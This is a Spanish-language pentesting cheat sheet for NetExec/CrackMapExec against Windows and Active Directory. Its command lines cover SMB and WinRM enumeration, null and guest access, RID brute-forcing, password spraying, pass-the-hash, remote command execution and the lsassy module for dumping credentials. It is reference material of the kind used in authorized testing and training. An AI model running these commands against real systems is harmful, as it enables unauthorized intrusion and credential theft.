⟁ HXA πŸ‡¬πŸ‡§ EN 
β”Œβ”€[ CrackMapExec / NetExec ]─────────────────────────────────────────────────────────────────────────
β”‚ user: Alejandro Lopez Aguilar
β”” path: /linux-and-herramientas/herramientas/crackmapexec-netexec/
NetExec (`nxc`) es el sucesor moderno de CrackMapExec (`crackmapexec`/`cme`). Se usa para enumerar, 
validar credenciales y automatizar acciones en entornos Windows/Active Directory desde protocolos 
como SMB, WinRM, LDAP, MSSQL o RDP.

~ β–Έ Uso bΓ‘sico

β”Œβ”€[ bash ]──────────────────────────────────────────────────────────────────────────────────────────
nxc smb <IP/RANGO> -u <usuario> -p '<password>'
nxc smb <IP/RANGO> -u <usuario> -H <NTLM_HASH>
nxc winrm <IP> -u <usuario> -p '<password>'
└───────────────────────────────────────────────────────────────────────────────────────────────────
Con CrackMapExec clΓ‘sico la idea es equivalente:

β”Œβ”€[ bash ]──────────────────────────────────────────────────────────────────────────────────────────
crackmapexec smb <IP/RANGO> -u <usuario> -p '<password>'
crackmapexec smb <IP/RANGO> -u <usuario> -H <NTLM_HASH>
└───────────────────────────────────────────────────────────────────────────────────────────────────
~ πŸ”Ž EnumeraciΓ³n SMB

β”Œβ”€[ bash ]──────────────────────────────────────────────────────────────────────────────────────────
nxc smb <IP> -u '<usuario>' -p '<password>' --shares
nxc smb <IP> -u '<usuario>' -p '<password>' --users
nxc smb <IP> -u '<usuario>' -p '<password>' --groups
nxc smb <IP> -u '<usuario>' -p '<password>' --pass-pol
nxc smb <IP> -u '<usuario>' -p '<password>' --loggedon-users
└───────────────────────────────────────────────────────────────────────────────────────────────────
~ β–Έ Acceso nulo o guest

β”Œβ”€[ bash ]──────────────────────────────────────────────────────────────────────────────────────────
nxc smb <IP> -u '' -p '' --shares
nxc smb <IP> -u 'guest' -p '' --shares
nxc smb <IP> -u '' -p '' --rid-brute
└───────────────────────────────────────────────────────────────────────────────────────────────────
`--rid-brute` puede ayudar a descubrir usuarios cuando SMB permite enumeraciΓ³n por RID.

~ β–Έ Password spraying

β”Œβ”€[ bash ]──────────────────────────────────────────────────────────────────────────────────────────
nxc smb <IP/RANGO> -u users.txt -p 'Password123!' --continue-on-success
nxc smb <IP/RANGO> -u users.txt -p passwords.txt --continue-on-success
└───────────────────────────────────────────────────────────────────────────────────────────────────
Para evitar bloqueos de cuenta, revisar siempre la polΓ­tica de contraseΓ±as antes de hacer spraying:

β”Œβ”€[ bash ]──────────────────────────────────────────────────────────────────────────────────────────
nxc smb <DC_IP> -u '<usuario>' -p '<password>' --pass-pol
└───────────────────────────────────────────────────────────────────────────────────────────────────
~ πŸ” Pass The Hash

β”Œβ”€[ bash ]──────────────────────────────────────────────────────────────────────────────────────────
nxc smb <IP> -u '<usuario>' -H '<NTLM_HASH>'
nxc winrm <IP> -u '<usuario>' -H '<NTLM_HASH>'
└───────────────────────────────────────────────────────────────────────────────────────────────────
Si aparece `Pwn3d!`, normalmente el usuario tiene permisos suficientes para ejecuciΓ³n remota sobre 
ese protocolo.

~ β–Έ EjecuciΓ³n de comandos

β”Œβ”€[ bash ]──────────────────────────────────────────────────────────────────────────────────────────
nxc smb <IP> -u '<usuario>' -p '<password>' -x 'whoami'
nxc smb <IP> -u '<usuario>' -p '<password>' -X 'whoami'
nxc winrm <IP> -u '<usuario>' -p '<password>' -x 'whoami'
└───────────────────────────────────────────────────────────────────────────────────────────────────
`-x` ejecuta comandos vΓ­a cmd y `-X` vΓ­a PowerShell.

~ β–Έ Local Auth

Para probar credenciales locales en lugar de dominio:

β”Œβ”€[ bash ]──────────────────────────────────────────────────────────────────────────────────────────
nxc smb <IP/RANGO> -u 'Administrator' -p '<password>' --local-auth
nxc smb <IP/RANGO> -u 'Administrator' -H '<NTLM_HASH>' --local-auth
└───────────────────────────────────────────────────────────────────────────────────────────────────
~ β–Έ MΓ³dulos ΓΊtiles

β”Œβ”€[ bash ]──────────────────────────────────────────────────────────────────────────────────────────
nxc smb <IP> -u '<usuario>' -p '<password>' -M spider_plus
nxc smb <IP> -u '<usuario>' -p '<password>' -M lsassy
nxc smb <IP> -u '<usuario>' -p '<password>' -M enum_av
└───────────────────────────────────────────────────────────────────────────────────────────────────
Para listar mΓ³dulos disponibles:

β”Œβ”€[ bash ]──────────────────────────────────────────────────────────────────────────────────────────
nxc smb -L
└───────────────────────────────────────────────────────────────────────────────────────────────────
:: β–Έ Referencias

~ NetExec Wiki - SMB shares
~ CrackMapExec Wiki - SMB Command Reference


ret <volume_3>  <indice>